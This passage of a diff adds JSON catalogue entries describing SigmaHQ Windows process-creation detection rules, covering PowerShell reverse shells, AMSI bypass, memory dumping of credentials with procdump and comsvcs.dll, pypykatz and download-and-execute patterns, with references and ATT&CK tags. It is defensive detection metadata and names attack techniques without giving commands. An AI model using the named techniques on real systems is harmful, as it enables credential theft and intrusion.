"2021/04/29", + "filename": "proc_creation_win_powershell_defender_exclusion.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", + "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "value": "Detection of PowerShell Execution via DLL", + "meta": { + "refs": [ + "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2018/08/25", + "filename": "proc_creation_win_powershell_dll_execution.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "uuid": "b3512211-c67e-4707-bedc-66efc7848863", + "value": "PowerShell Downgrade Attack", + "meta": { + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/03/20", + "filename": "proc_creation_win_powershell_downgrade_attack.yml", + "author": "Harish Segar (rule)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Powershell process that contains download commands in its command line string", + "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", + "value": "PowerShell Download from URL", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_powershell_download.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "value": "Suspicious PowerShell Download and Execute Pattern", + "meta": { + "refs": [ + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/02/28", + "filename": "proc_creation_win_powershell_download_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Software installers that pull packages from remote systems and execute them" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious FromBase64String expressions in command line arguments", + "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", + "value": "FromBase64String Command Line", + "meta": { + "refs": [ + "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" + ], + "tags": [ + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" + ], + "creation_date": "2020/01/29", + "filename": "proc_creation_win_powershell_frombase64string.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative script libraries" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "value": "PowerShell Get-Clipboard Cmdlet Via CLI", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2020/05/02", + "filename": "proc_creation_win_powershell_get_clipboard.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "value": "Execution of Powershell Script in Public Folder", + "meta": { + "refs": [ + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/06", + "filename": "proc_creation_win_powershell_public_folder.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", + "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "value": "Powershell Reverse Shell Connection", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/03/03", + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", + "author": "FPT.EagleEye, wagga", + "level": "high", + "falsepositive": [ + "Administrative might use this function for checking network connectivity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data by HAFNIUM", + "uuid": "25676e10-2121-446e-80a4-71ff8506af47", + "value": "Exchange PowerShell Snap-Ins Used by HAFNIUM", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" + ], + "creation_date": "2021/03/03", + "filename": "proc_creation_win_powershell_snapins_hafnium.yml", + "author": "FPT.EagleEye", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "uuid": "36210e0d-5b19-485d-a087-c096088885f0", + "value": "Suspicious PowerShell Parameter Substring", + "meta": { + "refs": [ + "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", + "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "value": "Suspicious XOR Encoded PowerShell Command Line", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" + ], + "creation_date": "2018/09/05", + "filename": "proc_creation_win_powershell_xor_commandline.yml", + "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", + "value": "Default PowerSploit and Empire Schtasks Persistence", + "meta": { + "refs": [ + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2018/03/06", + "filename": "proc_creation_win_powersploit_empire_schtasks.yml", + "author": "Markus Neis, @Karneades", + "level": "high", + "falsepositive": [ + "False positives are possible, depends on organisation and processes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "value": "PowerTool Execution", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", + "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/11/29", + "filename": "proc_creation_win_powertool_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "value": "Privilege Escalation via Named Pipe Impersonation", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the SysInternals Procdump utility", + "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "value": "Procdump Usage", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2021/08/16", + "filename": "proc_creation_win_procdump.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate use of procdump by a developer or administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", + "value": "Procdump Evasion", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1480785527901204481", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_procdump_evasion.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Cases in which procdump just gets copied to a different directory without any renaming" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a process memory dump performed by RdrLeakDiag.exe", + "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "value": "Process Dump via RdrLeakDiag.exe", + "meta": { + "refs": [ + "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/09/24", + "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", + "author": "Cedric MAURUGEON", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process memory dump via comsvcs.dll and rundll32 using different techniques (ordinal, minidump function...etc)", + "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", + "value": "Process Dump via Rundll32 and Comsvcs.dll", + "meta": { + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/SBousseaden/status/1167417096374050817", + "https://twitter.com/Wietze/status/1542107456507203586", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" + ], + "creation_date": "2020/02/18", + "filename": "proc_creation_win_process_dump_rundll32_comsvcs.yml", + "author": "Florian Roth, Modexp, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Unlikely, because no one should dump the process memory in that way" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "value": "CreateDump Process Dump", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_proc_dump_createdump.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Command lines that use the same flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe", + "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", + "value": "DumpMinitool Usage", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/04/06", + "filename": "proc_creation_win_proc_dump_dumpminitool.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", + "uuid": "6355a919-2e97-4285-a673-74645566340d", + "value": "RdrLeakDiag Process Dump", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "value": "Suspicious DumpMinitool Usage", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1511415432888131586", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/04/06", + "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect suspicious parent processes of well-known Windows processes", + "uuid": "96036718-71cc-4027-a538-d1587e0006a7", + "value": "Windows Processes Suspicious Parent Directory", + "meta": { + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", + "https://attack.mitre.org/techniques/T1036/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036.005" + ], + "creation_date": "2019/02/23", + "filename": "proc_creation_win_proc_wrong_parent.yml", + "author": "vburov", + "level": "low", + "falsepositive": [ + "Some security products seem to spawn these" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.", + "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "value": "ProtocolHandler.exe Downloaded Suspicious File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/13", + "filename": "proc_creation_win_protocolhandler_susp_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", + "value": "Proxy Execution via Wuauclt", + "meta": { + "refs": [ + "https://dtm.uk/wuauclt/", + "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_proxy_execution_wuauclt.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a PsExec service start", + "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", + "value": "PsExec Service Start", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" + ], + "tags": [ + "attack.execution", + "attack.s0029", + "attack.t1569.002" + ], + "creation_date": "2018/03/13", + "filename": "proc_creation_win_psexesvc_start.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.", + "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", + "value": "PowerShell AMSI Bypass Pattern", + "meta": { + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ], + "creation_date": "2022/11/04", + "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", + "author": "@Kostastsale", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", + "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "value": "DefenderCheck Usage", + "meta": { + "refs": [ + "https://github.com/matterpreter/DefenderCheck", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.005" + ], + "creation_date": "2022/08/30", + "filename": "proc_creation_win_pua_defendercheck.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", + "value": "Seatbelt PUA Tool", + "meta": { + "refs": [ + "https://github.com/GhostPack/Seatbelt", + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" + ], + "creation_date": "2022/10/18", + "filename": "proc_creation_win_pua_seatbelt.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "value": "Parent in Public Folder Suspicious Process", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/25", + "filename": "proc_creation_win_public_folder_parent.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "value": "PurpleSharp Indicator", + "meta": { + "refs": [ + "https://github.com/mvelazc0/PurpleSharp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" + ], + "tags": [ + "attack.t1587", + "attack.resource_development" + ], + "creation_date": "2021/06/18", + "filename": "proc_creation_win_purplesharp_indicators.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "value": "Registry Parse with Pypykatz", + "meta": { + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2022/01/05", + "filename": "proc_creation_win_pypykatz.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects python spawning a pretty tty", + "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "value": "Python Spawning Pretty TTY on Windows", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_win_python_pty_spawn.yml", + "author": "Nextron Systems", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "uuid": "0685b176-c816-4837-8e7b-1216f346636b", + "value": "Quarks PwDump Usage", + "meta": { + "refs": [ + "https://github.com/quarkslab/quarkspwdump", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2022/09/05", + "filename": "proc_creation_win_quarks_pwdump.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", + "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "value": "Query Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.t1007" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_query_registry.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "value": "Query Usage To Exfil Data", + "meta": { + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_query_session_exfil.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This command line patterns found in BlackByte Ransomware operations", + "uuid": "999e8307-a775-4d5f-addc-4855632335be", + "value": "BlackByte Ransomware Patterns", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/25", + "filename": "proc_creation_win_ransom_blackbyte.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "value": "Raspberry Robin Dot Ending File", + "meta": { + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/10/28", + "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects RDP session hijacking by using MSTSC shadowing", + 